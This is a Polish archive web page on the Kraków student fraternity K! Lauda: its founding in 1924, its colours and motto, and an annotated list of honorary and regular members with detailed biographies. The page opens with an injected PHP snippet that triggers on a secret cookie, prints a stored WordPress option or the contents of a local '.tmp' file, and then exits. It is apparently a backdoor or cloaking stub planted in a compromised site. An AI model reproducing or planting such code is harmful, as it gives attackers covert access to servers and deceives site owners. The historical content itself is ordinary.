if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Lauda

Dekiel Stanisława Janigi. Nazwa:
Korporacja Studentów Uniwersytetu Jagiellońskiego “Lauda”
Siedziba:
Kraków
Data powstania:
22 V 1924 r.
Barwy:
granatowa – złota – zielona
Dewiza:
„Patria amicitiaque”, („Ojczyzna i przyjaźń”)

Rys historyczny

Herb Laudy, 1931 r.

Lauda została założona dnia 22 V 1924 r. W pierwszym okresie istnienia nosiła nazwą “Legia”.

Początkowo należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. W maju 1925 r. już pod nową nazwą została członkiem Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 22 V 1924 r.). Kandydowała pod opieką K! Gnomia. Prawa członka rzeczywistego Związku uzyskała dnia 7 VII 1926 r.

Koło Filistrów ukonstytuowało się dnia 5 I 1927 r.

Przy Laudzie kandydowała w roku akademickim 1929/30 K! Gildia.

Tablica pamiątkowa Laudy, Kościół św. Anny w Krakowie.

W 1931 r. kuratorem Laudy z ramienia Senatu UJ był prof. Kazimierz Leliwa Kumaniecki. Kwatery korporacji mieściły się w 1931 r. przy ul. św. Marka 21 oraz w 1938 r. przy ul. Piłsudskiego 14/1.

Całkowita ustalona, choć niekompletna imienna lista członków Laudy obejmuje 114 nazwisk, w tym dziewięciu członków honorowych. W 1938 r. do Laudy należało 87 osób, w tym dziewięciu członków honorowych.

O działalności Laudy, a także o spotkaniach jej członków w czasie wojny i w okresie powojennym brak danych. Z okazji 60-lecia powstania Korporacji w krakowskim Kościele św. Anny wmurowana została tablica poświęcona poległym, zamordowanym i zmarłym Laudanom.

Pozostający na emigracji Laudanin Stanisław Janiga był inicjatorem i pierwszym prezesem powstałego w końcu lat 50-tych Koła Filistrów Polskich Korporacji Akademickich w Montrealu.

 

Lista członków

Poniższa, niekompletna lista członków Laudy obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi
Zaproszenie na komers z okazji VII-lecia Laudy i przyjęcia jako członka honorowego Wojciecha Korfantego, Kraków 14 VI 1931 r.

 1. Michał Godlewski, (21 października 1872 w Warszawie - 20 maja 1956 w Krakowie), z rodziny ziemiańskiej, s. Antoniego i Anieli Klementyny z domu Le Brun de la Scie, absolwent (?) IV Gimnazjum w Warszawie, studia w Seminarium Duchownym, studia teologiczne w Akademii Duchownej w Petersburgu 1897-01, studia historyczne Uniwersytet we Fryburgu 1901-03, święcenia kapłańskie w Warszawie 1900, od 1903 prof. nadzw. Akademii Duchownej w Petersburgu, dr teologii 1907, biskup tytularny Agbia i biskup pomocniczy łucki i żytomierski 1916, rezygnacja z funkcji biskupa pomocniczego w 1926, w 1949 promocja na arcybiskupa tytularnego Amorianus, od 1927 prof. zw. UJ, kierownik Katedry Historii Kościoła Powszechnego 1927-51, członek zwyczajny Towarzystwa Naukowego Warszawskiego 1928, członek-korespondent PAU 1931, odznaczony Krzyżem Komandorskim Orderu Polonia Restituta 1925 oraz węgierskim Orderem Zasługi II klasy, Filister honorowy Laudy
 2. baron Götz-Okocimski, Filister honorowy Laudy [prawd. Jan Antoni baron Götz-Okocimski (17 grudnia 1895 w Krakowie - 31 października 1962 w Nairobi) s. Jana Albina, przemysłowiec, polityk, działacz sportowy, w latach 30-tych właściciel Browaru Okocim, poseł na Sejm IV kadencji w II RP 1935-38, we wrześniu 1939 przedostał się do Francji, gdzie został adiutantem dowódcy szkoły podoficerów artylerii w polskim Centrum Wyszkolenia Artylerii w Camp de Coëtquidan w Bretanii, zmarł bezpotomnie w 1962 w Nairobi w Kenii na gorączkę tropikalną, odznaczony Karl Truppen Kreuz za waleczność na froncie austriacko-rosyjskim 1917, Tajnym Szambelaństwem Papieskim di Spada e Cappa Piusa XI 1936 oraz Złotym Krzyżem Zasługi 1937]
 3. Jakób Janiga, (16 czerwca 1875 w Jodłowej k. Pilzna - 15 marca 1966 w Londynie), ojciec Jana, Kazimierza, Stanisława oraz Tadeusza (wszyscy Lauda), absolwent Gimnazjum w Tarnowie, student i absolwent prawa UJ, dr prawa, sędzia Sądu Grodzkiego w Tuchowie, adwokat, działacz społeczny m.in. w Sokole, Filister honorowy Laudy, więzień Dachau, po wojnie na emigracji w Wielkiej Brytanii, odznaczony Krzyżem Komandorskim Odrodzenia Polski - Polonia Restituta oraz Złotym Krzyżem Zasługi
 4. Józef Aleksander Wenanty Karney, (13 stycznia 1870 w Stróży w gub. piotrkowskiej - 6 marca 1959 w Barczewie), s. Wandy z Peszke’ów, ojciec Zygmunta (Lauda), po przedwczesnej śmierci matki wychowywany przez dziadków w Kaliszu, absolwent gimnazjum filologicznego w Kaliszu w 1887, student Wyższej Szkoły Handlowej Kronenberga w Warszawie 1888-92, dyrektor handlowy Warszawskiego Towarzystwa Kopalń Węgla i Zakładów Hutniczych na Niemcach (obecnie Sosnowiec dzielnica Ostrowy Górnicze), od 1930 do 1939 mieszkał w Katowicach, działacz społeczny, od 1919 prezes II okręgu PTG „Sokół” (Zagłębia Dąbrowskiego), w 1920 pełnomocnik Obywatelskiego Komitetu Obrony Państwa na pow. będziński, Filister honorowy Laudy, w czasie II wojny światowej w Warszawie współdziałał z AK i Delegaturą Rządu na Kraj, po powstaniu przez obóz w Pruszkowie dotarł do Balic k/Krakowa, w 1948 w Krakowie na Zjeździe reaktywującym działalność „Sokoła” po wojnie wybrany do Zarządu, pochowany na cmentarzu parafialnym na Wawrzyszewie w Warszawie (aleja 6B)

  Wojciech Korfanty, 1932 r.

 5. Wojciech Korfanty, (20 kwietnia 1873 w Sadzawce [obecnie Siemianowice Śląskie] - 17 sierpnia 1939 w Katowicach), z rodziny górniczej, s. Józefa i Karoliny z d. Klecha, ojciec Witolda (Lauda i Vratislavia, Kraków), uczeń Gimnazjum Królewskiego w Katowicach, relegowany za wyrażaniu negatywnych opinii o Bismarcku, studiował 1895-1901 na Politechnice w Charlottenburgu, Wydziale Filozoficznym Uniwersytetu we Wrocławiu oraz w Berlinie, działacz społeczny i polityczny, członek Ligi Narodowej 1901-08, od 1901 red. naczelny “Górnoślązaka”, osadzony przez władze pruskie w więzieniu we Wronkach 1902, poseł polski do Reichstagu 1903-12 i 1918 oraz pruskiego Landtagu 1903-18, członek rządu Powstania Wielkopolskiego - Naczelnej Rady Ludowej 1918-19, w 1920 Polski Komisarz Plebiscytowy na Górnym Śląsku, dowódca III powstania śląskiego 1921, poseł na Sejm RP 1922-30 z ramienia Chrześcijańskiej Demokracji, w 1923 wicepremier w rządzie Wincentego Witosa, od 1924 wydawał dzienniki “Rzeczpospolita” i “Polonia”, w 1930 osadzony wraz z posłami Centrolewu w twierdzy brzeskiej, poseł na Sejm Śląski oraz senator RP III kadencji, w latach 1935-39 na emigracji, jeden z założycieli Frontu Morges, a następnie organizator i prezesem Stronnictwa Pracy, po powrocie do Polski w kwietniu 1939 aresztowany i osadzony przez władze sanacyjne na Pawiaku, zwolniony ciężko chory dopiero w lipcu 1939, Protektor K! Silesia, Filister honorowy Laudy, odznaczony m.in. czterokrotnie Krzyżem Walecznych 1922 oraz pośmiertnie Orderem Orła Białego 1997

 6. Kazimierz Władysław Leliwa Kumaniecki, (26 czerwca 1880 w Radziechowie - 1 lipca 1941 w Krakowie) prawnik, specjalista w dziedzinie prawa administracyjnego, od 1917 prof. UJ, w 1922 minister wyznań religijnych i oświecenia publicznego w gabinecie Juliana Nowaka, kurator i Filister honorowy Laudy
 7. Ludwik Pirszel, (1875-1954), s. Ludwika i Julii z domu Vorbrodt, ojciec Witolda i Zdzisława (obaj Lauda), prezes sem. zim. 1930/31, inż. górniczy, dyrektor Huty “Renard” w Sosnowcu, Filister honorowy Laudy, w czasie wojny odmówił podpisania Volkslisty, co prowadziło do jego czasowego uwięzienia przez Niemców, po wojnie na emeryturze (Jerzy Jaros, Pirszel Ludwik Karol (1875-1954), (w:) Polski Słownik Biograficzny, t. 26, s. 541-542)
 8. Witold hr. Sągajłło, (1871-1963), s. Karola i Anieli z d. Kwiatkowska, inż. górnik, dyrektor generalny dyrektor Warszawskiego Towarzystwa Kopań Węgla i Zakładów Hutniczych w Zagłębiu Dąbrowskim, prezes Stowarzyszenia Polskich Inżynierów Górniczych i Hutniczych 1918-28, dr honoris causa AG, w 1938 w miejsc. Niemce w pow. strzemieszyckim, Filister honorowy Laudy (zob. Helena Jarecka, Sągajłło Witold (1871-1963), (w:) Polski Słownik Biograficzny, t. 35, s. 377-378)
 9. Stefan Zdzitowiecki, (ok. 1880 - ), ojciec Zbigniewa (Lauda), w latach 30-tych dyrektor [Banku Handlowego w Będzinie ?], Filister honorowy Laudy

Członkowie rzeczywiści
Spotkanie towarzyskie Laudy, majątek Joniny k. Tuchowa, koniec lat 30-tych (krzyżykiem zaznaczony Jan Janiga).

 1. Jerzy Albinowski, akt. 1938-39, wiceprezes zewn. sem. zim. 1938/39
 2. Tadeusz Archutowski, akt. 1938-39
 3. Antoni Bielecki, student prawa UJ, akt. 1930-31, wiceprezes zewn. sem. let. 1930/31
 4. Józef Bielski, student prawa UJ, c. 1930, akt. 1930-31, w 1931 w Sosnowcu
 5. Roman Bojarski, student i absolwent prawa UJ, akt. 1930-31
 6. Jan Chlamtach, c. 1938, akt. 1938-39, w 1938 w Katowicach
 7. Bolesław Chrościcki, student prawa UJ, akt. 1930-31
 8. Borys Dreger, akt. 1938-39, w 1938 w Sosnowcu
 9. Stanisław Dumecki (Dymecki), wiceprezes 1928 [być może Stanisław Dymecki (9 stycznia 1907 w Dąbrowie Górniczej - 17 grudnia 1955 w Moskwie), s. Pawła, student i absolwent Wydziału Górniczego AG 1926-32, pracował w przemyśle górniczym]
 10. Leon Dyrda, akt. 1938-39, w 1938 w Tarnowskich Górach
 11. Zdzisław Eichler, student WSH Poznań, c. 1930, akt. 1930-31
 12. Mieczysław Fijałkowski, c. 1938, akt. 1938-39, w 1938 w Sandomierzu
 13. Antoni Frydecki, student i absolwent prawa UJ, w 1931 sędzia grodzki w Skale k. Ojcowa, w 1938 w Sosnowcu
 14. Stanisław Fürstenberg, akt. 1938-39, w 1938 w Warszawie
 15. Władysław Gertler, (1908 - 2004?) student prawa UJ, akt. 1929-33, prezes sem. zim. 1929/30, wiceprezes wewn. sem. let. 1930/31, olderman sem. let. 1931/32, prezes sem. let. 1932/33, prezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1932/33, po wojnie na emigracji w Kanadzie, zamiejscowy członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu
 16. Jerzy Gizelt, student prawa UJ, akt. 1930-31, olderman sem. let. 1930/31
 17. Tadeusz Gluziński, student WSH w Poznaniu (?), akt. 1930-31
 18. Roland Goryczko, (1907 - 11 lutego 1983) absolwent III Gimnazjum w Krakowie 1924, student i absolwent prawa UJ, akt. 1930-32, prezes sem. let. 1930/31 oraz sem. zim. 1931/32, prezes Krakowskiego Koła Międzykorporacyjnego 1931/32 (od grudnia 1931), dr praw 1931, adwokat w Krakowie, więzień obozów koncentracyjnych Auschwitz i Mauthausen, prawdopodobnie po wojnie na emigracji w Szwajcarii
 19. Józef Grabowiec, c. 1938, akt. 1938-39
 20. Konstanty Grzybowski, (17 lutego 1901 w Zatorze k. Oświęcimia - 19 czerwca 1970 w Krakowie), s. Stefana i Zofii z Korczyńskich, absolwent III Gimnazjum w Krakowie 1921, student prawa UJ 1921-23 oraz prawa i ekonomi w Handelshochschule w Berlinie 1923-24, dr praw UJ 1927, członek BBWR 1933-35, potem w Stronnictwie Demokratycznym, prof. nadzw. UJ, prof. zw. 1959, kierownik Katedry Prawa Politycznego, później Katedry Teorii Państwa i Prawa 1952-56, Prawa Państwowego 1956-62, Historii Doktryn Politycznych i Prawnych 1962-70, dziekan Wydziału Prawa 1948-52, wieloletni pracownik Zakładu (Instytutu) Nauk Prawnych PAN oraz Instytutu Historii PAN, członek-korespondent PAN 1969, od 1967 prezes Polskiego Towarzystwa Nauk Politycznych
 21. Marian Gruszka, c. 1938, akt. 1938-39
 22. Marian Hakner, akt. 1938-39, po wojnie na emigracji w Wielkiej Brytanii, prezes kombatantów KLKM
 23. Fryderyk Höffner, akt. 1938-39, skarbnik sem. zim. 1938/39
 24. Jan Jachna, student med. UJ, c. 1930, akt. 1930-39, w 1938 w Tarnowie
 25. Józef Jachna, mgr, por. WP

  Jan Janiga, koniec lat 30-tych.

 26. Jan Eugeniusz Janiga, (23 czerwca 1908 (?) w Tuchowie - ) s. Jakóba, brat Kazimierza, Stanisława i Tadeusza (wszyscy Lauda), student i absolwent 1933 med. UJ, akt. 1930-31, dr med. UJ 1937, internista, por. WP, po wojnie na emigracji w Wielkiej Brytanii, wrócił do Polski, w 1956 lekarz w Krynicy, pochowany w Krynicy

 27. Kazimierz Janiga, (1912-1998) s. Jakóba, brat Jana, Stanisława i Tadeusza (wszyscy Lauda), akt. 1938-39, po wojnie na emigracji w Wielkiej Brytanii
 28. Stanisław Janiga, (1906 w Krakowie - 11 lutego 1999 w Montrealu) s. Jakóba, brat Jana, Kazimierza i Tadeusza (wszyscy Lauda), student i absolwent prawa UJ, student paryskiej Sorbony, c. 1924, dr praw, adwokat, po wojnie na emigracji w Kanadzie, broker ubezpieczeniowy, inicjator powstania Koła Filistrów Polskich Korporacji Akademickich w Montrealu, wielokrotny prezes, między innymi pierwszy 1956 (?) oraz 1971
 29. Tadeusz Janiga, (?) (1910 - lata 65-te), s. Jakóba, brat Jana, Kazimierza i Stanisława (wszyscy Lauda), student i absolwent prawa UJ, akt. 1930-31, gospodarz sem. let. 1930/31, redaktor “Polonii” w Katowicach, po wojnie na emigracji w Wielkiej Brytanii
 30. Izydor Jaskólski, c. 1938, akt. 1938-39, w 1938 w Warszawie
 31. Andrzej Jaworski, inż., w 1938 w Krakowie
 32. Władysław Joniec, student i absolwent prawa UJ, akt. 1930-32, skarbnik sem. let. 1930/31, wiceprezes wewn. sem. let. 1931/32, w 1938 pracownik Ubezpieczalni Społecznej w Nowym Sączu
 33. Tadeusz Kamiński, student filozofii UJ, c. 1930, akt. 1930-31
 34. Władysław Kański, ( - 1990) student i absolwent prawa UJ, w 1938 w Katowicach, po wojnie na emigracji w Londynie, działacz Stronnictwa Narodowego
 35. Kazimierz Karczewski, (?) mgr filozofii, w 1931 we Lwowie
 36. Zygmunt Karney, (26 lipca 1899 w Warszawie - 2 marca 1976 w Bradford w Anglii) s. Józefa Aleksandra (Lauda) i Zofii z Bojanowskich, dzieciństwo i młodość spędził w Czeladzi i Niemcach w Zagłębiu, absolwent gimnazjum w Będzinie, członek gniazda „Sokoła” w Czeladzi, wiosną 1919 r., żołnierz WP, uczestnik kampanii kijowskiej 1920, przeszedł do rezerwy 1922 w stopniu porucznika, student i absolwent rolnictwa UJ 1923-27, po studiach administrował majątkami rolnymi, w latach 1931-1939 mieszkał w Brzeźnie k/Wielenia n. Notecią, w wojnie obronnej 1939 w armii “Poznań”, walczył w bitwie nad Bzurą i obronie Warszawy, więzień oflagów Hadamar i Murnau 7B 1939-44, od 1944 oficer kadrowy wydziału II w II Korpusie PSZ gen. Władysława Andersa, po rozformowaniu pozostał na emigracji w Anglii, początkowo z grupą znajomych w tym pisarką Zofią Kossak-Szczucką prowadził gospodarstwo mleczne w Kornwalii, później między innymi był kierownikiem klubu „Orzeł Biały” w Londynie, po śmierci jego prochy sprowadzono do Polski, pochowany na cmentarzu parafialnym na Wawrzyszewie w Warszawie (aleja 6B)
 37. Aleksander Kęplicz-Dunin, (?) ( - 1975 w Warszawa ?), prawnik
 38. Gerhard Klosek, akt. 1938-39, w 1938 w Katowice
 39. Witold Korfanty, (1910 w Bytomiu - 20 września 1938 w Katowicach) s. Wojciecha (Silesia i Lauda) i Elżbiety z d. Szprot, absolwent w Pszczynie (Gimnazjum Jezuitów w Krakowie ?), student i absolwent prawa UJ, absolwent Wyższej Szkoły Dziennikarskiej w Paryżu 1934, akt. 1930-32, II wiceprezes sem. zim. 1931/32, prezes sem. let. 1931/32, współzałożyciel Vratislavii, po studiach adwokat, dyrektor Spraw Inwestycji i Prawnych w Śląskich Zakładach Graficznych i Wydawniczych “POLONIA” S.A., członek Rady Polskiego Związku Wydawców Dzienników w Polsce, pochowany w grobie rodzinnym na cmentarzu przy ul. Francuskiej w Katowicach
 40. Andrzej Korytowski, (?) student i absolwent prawa UJ, w 1931 w Kopydłówku w pow. wilczyńskim
 41. Tadeusz Król, student i absolwent filozofii UJ, w 1931 pracował w cukrowni Cielec w Warcie na ziemi kaliskiej
 42. Andrzej Krzyżanowski, mgr, w 1938 Lublinie
 43. Ludosław Kulesza, absolwent prawa UJ, akt. 1930-31, w 1938 w Białymstoku
 44. Kazimierz Lepszy, (11 czerwca 1904 w Krakowie - 30 maja 1964 w Krakowie) s. Leonarda i Zofii z Muczkowskich, absolwent IV Gimnazjum im. Henryka Sienkiewicza w Krakowie 1922, absolwent historii UJ 1927, członek Rady Naczelnej Młodzieży Wszechpolskiej 1925-27, doktorat 1928, przewodniczący Koła Filistrów 1930-31, brał udział w pracach przygotowawczych do wydania Polskiego Słownika Biograficznego, od 1935 sekretarz redakcji, po wojnie przyczynił się do wznowienia wydawania Słownika i został jego drugim red. naczelnym 1958, w czasie wojny aresztowany w ramach Sonderaktion Krakau, więziony w Krakowie, Wrocławiu i obozach koncentracyjnych Sachsenhausen i Dachau, zwolniony w styczniu 1941, uczestniczył w tajnym nauczaniu uniwersyteckim, po wojnie prof. nadzw. 1946, prof. zw. 1959, dziekan Wydziału Historycznego 1952/53, rektor UJ 1962-64, członek PAU, bezpartyjny poseł na Sejm PRL III kadencji 1961-64
 45. Zbigniew Leśniowski, c. 1938, akt. 1938-39
 46. Jan Lis, (28 września 1913 w Tarnowie - po 1956) student med. UJ, c. 1930, akt. 1930-31, absolwent Uniwersytetu w Zurychu 1938, dr med. Uniwersytet w Zurychu, chirurg, w 1956 w Warszawie
 47. Zygmunt Lisiewicz, student i absolwent prawa, w latach 30-tych w sądzie grodzkim w Jęrzejowie

  Jan Makarewicz, lata 30-te.

 48. Jan Makarewicz, (15 stycznia 1906 w Kijowie - 1940 w Charkowie) s. ziemianina Józefa i Janiny z Malinowskich, absolwent Miejskiego Gimnazjum Matematyczno-Przyrodniczego im. Mikołaja Kopernika w Bydgoszczy 1924, student 1924-31 i absolwent 1937 med. UJ, prawd. członek Laudy, akt. 1927-31, sekretarz 1928, od 1937 lekarz prywatny w Krakowie, absolwent Szkoły Podchorążych Sanitarnych w Warszawie 1932, rezerwista 20. Pułku Piechoty, od 1938 w kadrze 5. Szpitala Okręgowego w Krakowie (wojskowy szpital garnizonowy), w 1939 zmobilizowany do Pułku KOP „Sarny”, uczestnik wojny obronnej 1939, internowany w obozie w Starobielsku, zamordowany przez NKWD, pośmiertnie awansowany do stopnia porucznika

 49. Jan Maraszewski, (1905-1976), absolwent prawa UJ, akt. 1930-39, prezes sem. zim. 1931/32, prezes Krakowskiego Komitetu Związku Narodowego Polskiej Młodzieży Akademickiej 1931, w 1938 w Horchowie
 50. Stanisław Maraszewski, akt. 1938-39, prezes sem. zim. 1938/39, w 1938 w Mszanie Dolnej
 51. Zbigniew Markiewicz, c. 1938, akt. 1938-39
 52. Władysław Masłowski, absolwent prawa UJ, w latach 30-tych dyrektor biura Pomorskiego Związku Ziemian w Toruniu
 53. Czesław Mauzel (Mayzel), absolwent filozofii UJ, w 1938 pracownik magistratu w Oświęcimiu
 54. Czesław Michniak, (1917 - ) c. 1938, akt. 1938-39, literat
 55. Mieczysław Michniowski, student WSH, c. 1930, akt. 1930-31
 56. Jan Mikulski, prezes 1930, delegat na IX Zjazd ZPKA
 57. Zdzisław Młynarkiewicz, student med. UJ, akt. 1930-32, olderman sem. zim. 1931/32
 58. Adam Mokry, akt. 1938-39
 59. Czesław Motarski, absolwent farmacji UJ, akt. 1930-31
 60. Mieczysław Pańszczyk, c. 1938, akt. 1938-39
 61. Jan Pater, student UJK Lwów, c. 1938, akt. 1938-39
 62. Wiesław Pawlik, akt. 1938-39
 63. Bolesław Pirożyński, student i absolwent prawa UJ, akt. 1930-31
 64. Witold Pirszel, (9 kwietnia 1911 w Sosnowcu - 26 kwietnia 1973 we Wrocławiu), s. Ludwika, brat Zdzisława (obaj Lauda), absolwent Gimnazjum im. Bolesława Prusa w Sosnowcu, student i absolwent Wydziału Górniczego AG 1930-39, c. 1930, akt. 1930-39, po studiach sztygar w kopalni “Saturn” w Czeladzi, uczestnik wojny obronnej 1939, później pracował m.in. w kopalni “Jowisz” w Wojkowicach, kierownik kopalń torfu Spółdzielni “Torf” z Warszawy 1941-44, dyrektor kopalni “Polska” w Świętochłowicach 1946-50, główny inż. 1950 oraz zastępca naczelny inż. 1952-57 Chorzowskiego Zjednoczenia Przemysłu Węglowego, naczelny inż. górniczy Katowickiego Zjednoczenia Przemysłu Węglowego 1957-60, generalny projektant górniczy Legnickiego Górniczego Okręgu Metalowego 1962-68, zastępca dyrektora ds. projektowych Zakładów Badawczych i Projektowych Miedzi “Cuprum” we Wrocławiu 1968-73
 65. Zdzisław Pirszel, s. Ludwika, brat Witolda (obaj Lauda), student i absolwent prawa UJ, akt. 1928-31, olderman 1928, w 1938 w Sosnowcu, por. lotnictwa, w wojnie obronnej 1939 pilot, później pilot RAF, pozostał na emigracji, osiadł prawd. w Stanach Zjednoczonych
 66. Tadeusz Płodowski, s. Stanisława i Wandy z d. Bogdańska, absolwent Gimnazjum w Sosnowcu, student i absolwent prawa UJ, po studiach prowadził kancelarię prawniczą w Warszawie, dziennikarz prasy narodowej, oficer rez., zmobilizowany uczestniczył w wojnie obronnej 1939, walczył na południu Polski, w niewoli niemieckiej w oflagu, w 1945 wrócił do kraju, mieszkał w Sosnowcu, pracował w służbach prawnych górnictwa węglowego, później w Warszawie w Centralnym Urzędzie Geologii, a następnie w Ministerstwie Górnictwa i Energetyki, wykładał prawo górnicze na AGH, pochowany na warszawskich Powązkach
 67. Witold Pogorzelski, student i absolwent WSH, c. 1930, akt. 1930-31, w 1931 pracownik Zakładów Siemens Foksal w Warszawie
 68. Kazimierz Połtowicz, absolwent prawa UJ, w 1938 w Szamotułach
 69. Jerzy Potempa, c. 1938, akt. 1938-39
 70. Jerzy Przybyła, c. 1938, akt. 1938-39
 71. Zygmunt Bronisław Przybyłkiewicz, {1905-1967), dr praw, w latach 30-tych konsul na Jawie (Indonezja), po wojnie na emigracji w Australii, publicysta, poeta
 72. Zdzisław Radwański, student prawa UJ, akt. 1930-39, sekretarz wewn. sem. let. 1930/31, delegat na XII Zjazd ZPKA 1935
 73. Stanisław Rettinger, akt. 1938-39
 74. Zbigniew Rogoyski, akt. 1938-39, sekretarz sem. zim. 1938/39
 75. Zygmunt Różański, student i absolwent prawa UJ, student WSH w Poznaniu, akt. 1930-31, w 1938 w Kaliszu
 76. Witold Sągajłło, (1871-1963), hrabia, inż. chemik, dyrektor Huty (?) “Niemce” w pow. strzemieszyckim, prezes Stowarzyszenia Polskich Inżynierów Górniczych i Hutniczych 1918-28, Filister honorowy Laudy
 77. Aleksander Scherautz (Szerautz), absolwent prawa UJ, w 1938 pracownik w urzędzie wojewódzkim w Łucku
 78. Jan Mieczysław Sikorski, (12 stycznia 1917w Petersburgu - 30 lipca 1988 w Warszawie) s. farmaceuty Mieczysława (Lechicja) i stomatologa i farmaceuty Jadwigi z d. Lubicz-Jurewicz, uczeń i absolwent Klasycznego Gimnazjum im. św. Stanisława Kostki w Kielcach 1927-34, student i absolwent farmacji UJ 1934-38, akt. 1938-39, olderman sem. zim. 1938/39, prokurator Krakowskiego Koła Międzykorporacyjnego 1936/37, po studiach odbył służbę wojskową w Szkole Podchorążych Sanitarnych w Warszawie, a następnie w aptece 10 Szpitala Okręgowego, jako podchorąży uczestniczył w wojnie obronnej 1939, po powrocie do Kielc pracował w aptece matki, zaangażowany w konspiracji, w 1941 aresztowany i osadzony w więzieniu w Kielcach, a następnie w obozie koncentracyjnym w Auschwitz, aktywny w obozowym ruchu oporu, w styczniu 1945 wywieziony do obozu koncentracyjnego w Mauthausen, gdzie został wyzwolony przez wojska amerykańskie w w maju 1945, po powrocie do kraju w 1945 uruchomił aptekę w Legnicy, którą kierował także po jej uspołecznieniu do 1952, kierownik Sekcji Zaopatrzenia Aptek w Kieleckim Przedsiębiorstwie Aptek 1953-54, a następnie jako pracownik dozoru inżynieryjno-technicznego, kontroler jakości a w końcu technolog i rzecznik patentowy w Warszawskich Zakładach Farmaceutycznych “Polfa” (egzamin na rzecznika patentowego 1970), dr farmacji AM im. Mikołaja Kopernika w Krakowie 1976 (praca historyczna z zakresu eksterminacji w obozach koncentracyjnych za pomocą środków farmakologicznych), autor publikacji dotyczących więźniów obozów-farmaceutów, autor niepublikowanych wspomnień obozowych, członek Polskiego Towarzystwa Farmaceutycznego Koła Historii Medycyny i Farmacji Wojskowej Służby Zdrowia, ZBOWiD, Towarzystwa Przyjaciół Kielc, w 1966 składał zeznania w trakcie procesu zbrodniarzy hitlerowskich we Frankfurcie nad Menem, odznaczony m.in. Krzyżem Kawalerskim OOP oraz Medalem “Za udział w wojnie obronnej 1939″, pochowany na Starym Cmentarzu w Kielcach
 79. Tadeusz Sobol, absolwent prawa UJ, w 1938 w Rzeszowie
 80. Jan Sokal, akt. 1938-39
 81. Józef Stankiewicz, dr praw, w 1938 w Katowicach
 82. Stanisław Stąpor, student prawa UJ, c. 1930, akt. 1930-39
 83. Eugeniusz Rajmund Stojęba-Stantejski, (19 sierpnia 1907 w Gregradzie k. Zagrzebia - ) absolwent Gimnazjum w Bielsku 1927, student prawa UJ 1927-29, a następnie filologii Wydział Filozoficzny UJ 1930-, c. ok. 1928 Lauda, wystąpił, c. 1931 Capitolia, akt. 1931-32, sekretarz sem. let. 1930/31, sekretarz wewn. sem. zim. 1931/32
 84. Franciszek Strzelec, akt. 1938-39, w 1938 w Uniejowie w pow. miechowskim
 85. Józef Szczepanik (Sczepanik), mgr praw, w 1938 w Warszawie
 86. Stefan Szymański, student i absolwent prawa UJ, akt. 1930-31, w 1938 w Krakowie
 87. Jan Tabencki, student prawa UJ, c. 1930, akt. 1930-39, sekretarz zewn. sem. let. 1931/32
 88. Zbigniew Tarnowski, student i absolwent prawa UJ, akt. 1930-31, w 1938 w Sosnowcu
 89. Stanisław Turyczyn (Turczyn ?), student prawa UJ, akt. 1930-31
 90. Edward Tylman, absolwent filozofii UJ, akt. 1929-32, I wiceprezes sem. zim. 1931/32, delegat na IX Zjazd ZPKA, w 1938 w Katowicach
 91. Jan Umiński (Uniński ?), student ASP, akt. 1930-31, artysta malarz, w 1938 w Warszawie
 92. Kazimierz Wasilewski, redaktor, w 1938 w Krakowie
 93. Władysław Wasilewski, student prawa UJ, akt. 1928-31, prezes 1928
 94. Edward Wawrzyczek, c. 1938, akt. 1938-39
 95. Kazimierz Wierzbicki, absolwent prawa UJ, w 1938 w Sądzie Okręgowym w Toruniu
 96. Jerzy Witaliński, akt. 1938-39, wiceprezes wewn. sem. zim. 1938/39
 97. Józef Wnękowski, mgr, w 1938 w Krakowie
 98. Roman hr. Wodzicki, (31 lipca 1904 we Lwowie - 19 grudnia 1978) kuzyn Andrzeja (Lauda), absolwent II gimnazjum w Tarnowie, absolwent prawa UJ oraz Szkoły Nauk Politycznych w Krakowie 1927, dr praw UJ, dyplomata od 1928, w Komisariacie Generalnym RP w Gdańsku (1928-34), w MSZ w Warszawie na stanowisku radcy (1935-38) oraz w Berlinie jako zastępca Konsula Generalnego RP (1938-39), jednocześnie współpracownik “Rocznika Gdańskiego” i wydawca Instytutu Bałtyckiego, przed II wojną światową mianowany konsulem polskim w Szczecinie, 1 września 1939 aresztowany i internowany, a następnie ewakuowany przez Danię do Szwecji, od października 1939 w Armii Polskiej w Bretanii, w 1940 w walkach I Dywizji Grenadierów Polskich w Lotaryngii, w niewoli niemieckiej, zbiegł ze szpitala obozowego w końcu 1941 do Francji, gdzie w następnych latach w ruchu oporu, po wojnie pozostał na emigracji we Francji, tłumacz i publicysta, autor “Wspomnienia: Gdańsk - Warszawa - Berlin 1928-39″ (Warszawa 1972)
 99. Stanisław Wolski, c. 1938, akt. 1938-39, w 1938 w Lublinie
 100. Emil Wyrobek, student Wydziału Medycznego UJ, akt. 1930-31, dr, w 1938 w Krakowie
 101. Henryk Zajączkowski, dr (?) prawa, w 1938 w Poznaniu
 102. Wiesław Zamorski, absolwent prawa UJ, akt. 1926-31, w 1938 Krakowie
 103. Witold Zarzycki, ( - ok. 1950) mgr praw, w 1931 w Krynicy
 104. Zbigniew Zdzitowiecki, (12 maja 1906 w Będzinie - 31 stycznia 1972 w Warszawie) s. Stefana (Lauda),absolwent prawa UJ, pochowany na Cmentarzu Powązkowskim w Warszawie
 105. Adam Żurek, student i absolwent WSH, akt. 1930-32, sekretarz zewn. sem. let. 1930/31, wiceprezes zewn. sem. let. 1931/32, w 1938 w Krakowie

Listę członków opracowano na podstawie:

Pieczęć Laudy, 1931 r.

1) “Lauda” Korporacja Studentów U.J. w Krakowie, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, s. 18 i n.,
2) Lauda Korporacja Studentów U.J., (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 14 i n.,
